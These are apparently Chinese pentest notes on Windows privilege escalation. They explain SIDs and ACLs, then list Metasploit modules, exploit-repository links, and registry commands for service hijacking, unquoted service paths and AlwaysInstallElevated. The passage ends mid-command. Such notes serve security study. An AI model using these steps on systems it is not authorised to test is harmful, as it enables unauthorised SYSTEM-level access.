windows提权
windows安全要素
- Token
- password
- 安全描述符(SID和ACL组成)
- SID
- 组SID
- DACL任意访问控制列表,如果没有此表说明任何对象可访问
- SACL系统访问控制列表,指出存取方式(读、写、运行等)细节
- SID 如S-1-5-21-310440588-250036847-580389505-500
- 遵循模式S-R-IA_SA_SA_SA_RID
- S指明这是SID
- R是修订级别为1
- IA代表颁发机构ID编号为21
- SA代表子机构
- RID代表相对ID是SA指派的独立ID
- ACL(访问控制列表)
内核提权
找到对应版本可利用漏洞直接利用
#MSF利用
post/windows/gather/enum_patches #查补丁
post/multi/recon/local_exploit_suggester #查exp
#对照系统版本找exp
https://github.com/SecWiki/windows-kernel-exploits
https://bugs.hacking8.com/tiquan/
https://github.com/Heptagrams/Heptagram/tree/master/Windows/Elevation
https://www.exploit-db.com/
https://i.hacking8.com/tiquan/
系统配置错误提权
系统自动运行的一些服务权限较高,可替换服务文件
#msf利用
exploit/windows/local/service_permissions #权限劫持
没有双引号导致运行被劫持
#msf利用
set AutoRunScript migrate -f #自动迁移进程
注册键AlwaysInstallElevated允许其他用户以system权限安装文件
#cmd
#查看是否开启
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
#查看权限SeRestorePrivilege和SeTakeOwnershipPrivilege
whoami /priv
#开启AlwaysInstallElevated
reg add HKCU\SOFTWARE\Policies\Microsoft